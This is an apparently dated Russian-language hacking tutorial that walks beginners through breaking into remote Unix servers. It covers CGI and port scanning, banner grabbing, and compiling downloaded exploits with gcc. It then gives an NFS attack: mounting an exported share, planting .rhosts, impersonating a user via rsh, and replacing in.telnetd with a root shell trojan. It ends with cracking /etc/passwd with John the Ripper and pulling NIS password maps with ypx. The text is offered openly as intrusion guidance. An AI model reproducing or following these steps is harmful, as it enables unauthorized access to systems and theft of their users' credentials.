Итак, приступим! Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальных сканеров которых слава богу сейчас предостаточно. Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr, его можно скачать с йх официального сайта

http://www.cc.f2s.com/
еще правда есть сканер от группы Void
http://www.void.ru/
Но он немного уступает DCS по скорости сканирования. Ок, дальше, сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???, а дальше вам надо найти то как использовать этот эксплоит, я дам вам несколько ссылок где можно найти описание этих ошибок:

http://www.void.ru/
http://www.hack-crack.com/

или вы можете просто зайти на этот  сайт и просто ввести уязвимый скрипт в строке поиска:

http://www.securityfocus.com/

Второе и пожалуй главное - это сканирование портов, для сканирования можно использовать любой сканнер портов(какой - на ваш выбор их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут

http://www.nscan.hypermart.net/

этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней)

После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём, делается это с помощью клиента TELNET который есть даже в Вынь95 (98,2000), в командной строке TELNET вы пишете:

telnet>open www.target.com
и смотрите версию софта например: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. После того как вы посмотрели версию вы должны найти эксплоит под эту версию, идете опять же на:

http://www.securityfocus.com/
http://www.technotronic.com/

и вводите в строке поиска название программы и его версию.

После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привести к рабочему состоянию (как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд, то и компилировать его надо под этими системами. Если у вас нет установленного ЮНИКСА, то вам в любом случае (если хотите чего ни будь ломать нужен Юникс Шелл, то есть оболочка Юникс). Бесплатно её можно получить на http://www.nether.net/ и тому подобных серверах (введите на любом поисковике UNIX+SHELL+FREE)

Когда шелл получен и эксплоит скачен то можно приступать к компилированию, обычно эксплоит (в большинстве случаев) это программа на языке С, для компиляции будем использовать компилятор GCC, итак в командной строке оболочки пишем:

gcc -o exploit exploit.c и нижимаем Enter.

Хочу так же заметить что программы в Юникс подобный системах запускаются с "./"+имя программы, в нашем случае эксплоит будет запускаться:

>./exploit

Третье, еще один довольно популярный взлом системы это проверка на расшаренные папки, в Юникс то можно проверить с помощью утилиты showmount, итак из оболочки запускаем showmount:
>showmount -e www.сайт.com
и видим

/user/ Everyone

или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех
дальше пишем

>mount -t nfs сайт.remote.com:/user /mnt

потом переходми в каталог cd /mnt/home и устанавливаем .rhosts

>echo www.сайт.com user/.rhosts

дальше делаем следующее:

>cat /etc/passwd
user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно)

> su - user
! Становимся им

$ rsh target.remote.com /bin/csh -i

Warning! No access to terminal, job control disabled!

! И заходим на удаленную машину

% id

uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)

% ls -ldg /usr/etc

! Каталог доступен на запись

drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc

% grep telnet /etc/inetd.conf

telnet stream nowait root /usr/etc/in.telnetd in.telnetd

! Нашли программу, которая запустится

!под root"ом из нашего каталога

% cd /usr/etc

% mv in.telnetd in.telnetd1

! создаем троянского коня

% cat in.telnetd

>!/bin/sh

exec /bin/csh -i

% chmod 755 in.telnetd

! и запускаем его

% telnet 127.1

Connecting 127.1.

Warning! No access to terminal, job control disabled!

> chown user /etc;

! Делаем /etc своим

: command not found

> exit;

: command not found

Connection closed by foreign host.

> cd /etc

После того как у нас есть файл с паролями вы берете расшифровщик паролей Юникс - John The Ripper запускаете его и ждете пока расшифруются пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе!

И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера. Из облочки запускаем
>rpcinfo -p www.сайт.com | grep bind и если видим что-то типа

120000 2 udp 2493 ypbind

То пробуем сдлать следующее:

>ypx -o сайт.passwd -g target.remote.com

Берём файл с паролями и запускаем подборщик.

Источник